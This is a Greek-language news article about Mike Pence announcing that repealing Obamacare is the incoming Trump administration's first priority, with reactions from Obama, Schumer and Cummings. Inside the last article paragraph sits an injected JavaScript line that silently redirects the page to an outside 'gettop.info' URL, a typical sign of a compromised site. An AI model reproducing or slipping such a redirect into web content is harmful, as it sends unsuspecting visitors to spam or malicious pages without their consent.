Η κατάργηση του Obamacare η «πρώτη προτεραιότητα» του Τραμπ

0
11

Ο εκλεγμένος αντιπρόεδρος των ΗΠΑ Μάικ Πενς δήλωσε σήμερα ότι το σχέδιο των ρεπουμπλικάνων για την κατάργηση του προγράμματος ασφάλισης και υγειονομικής περίθαλψης που έχει γίνει γνωστό με την ονομασία Obamacare θα διαμορφωθεί τους αμέσως προσεχείς μήνες, προσπαθώντας με τον τρόπο αυτό να αποκρούσει τις καταγγελίες των Δημοκρατικών πως το Κογκρέσο και η επόμενη κυβέρνηση της χώρας ετοιμάζεται να διαλύσει το πρόγραμμα αυτό χωρίς να προτείνει καμιά εναλλακτική λύση.

«Η αρχιτεκτονική της αντικατάστασης του Obamacare θα αποφασιστεί, όπως πρέπει, μέσω της νομοθετικής διαδικασίες τις επόμενες εβδομάδες και τους επόμενους μήνες», τόνισε ο Πενς σε μια σύντομη συνέντευξη Τύπου που παραχώρησε μετά τις συναντήσεις που είχε με ρεπουμπλικάνους στο Καπιτώλιο.

Νωρίτερα, ο πρόεδρος των ΗΠΑ Μπαράκ Ομπάμα, ο οποίος θα παραδώσει την εξουσία στον εκλεγμένο διάδοχό του Ντόναλντ Τραμπ την 20ή Ιανουαρίου, κάλεσε μετ’ επιτάσεως τους δημοκρατικούς στο Κογκρέσο να υπερασπίσουν τον νόμο που προώθησε. Η έκκληση του Ομπάμα έγινε μετά τη δήλωση του Πενς ότι η κατάργησή του νόμου θα αποτελέσει την «πρώτη προτεραιότητα στην ημερήσια διάταξη» της κυβέρνησης Τραμπ.

Η Γερουσία άρχισε σήμερα να συζητά ένα σχέδιο ψηφίσματος το οποίο θα δώσει το έναυσμα για την κατάργηση του λεγόμενου Affordable Care Act (ο «Νόμος περί οικονομικά προσιτής περίθαλψης» του 2010), χάρη στο οποίο 2ο εκατομμύρια άνθρωποι που δεν είχαν ιατροφαρμακευτική κάλυψη στις ΗΠΑ μπόρεσαν να την αποκτήσουν.

Ο Ομπάμα θεωρεί τον νόμο αυτό ένα ορόσημο της προεδρίας του. Οι δημοκρατικοί κατηγορούν τους ρεπουμπλικάνους ότι θέλουν να καταργήσουν το νομοθέτημα αυτό χωρίς να έχουν κανένα σχέδιο για το τι θα αντικαταστήσει το Obamacare. «Το ρεπουμπλικανικό σχέδιο για την κατάργηση του συστήματος υγείας δεν θα κάνει την Αμερική σπουδαία ξανά» σχολίασε ειρωνικά ο πρόεδρος της κοινοβουλευτικής ομάδας των δημοκρατικών στη Γερουσία, ο Τσακ Σούμερ?παραπέμποντας στο κεντρικό προεκλογικό σύνθημα του Τραμπ: «θα κάνει την Αμερική άρρωστη ξανά, θα αντικαταστήσει με το χάος μια οικονομικά προσιτή περίθαλψη», πρόσθεσε.

Ο Ομπάμα, ο οποίος πήγε στο Κογκρέσο νωρίτερα, «μας ενθάρρυνε να δώσουμε μάχη», σημείωσε ο δημοκρατικός βουλευτής Ιλάιτζα Κάμινγκς μιλώντας στους δημοσιογράφους μετά τη συνάντηση με τον πρόεδρο των ΗΠΑ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here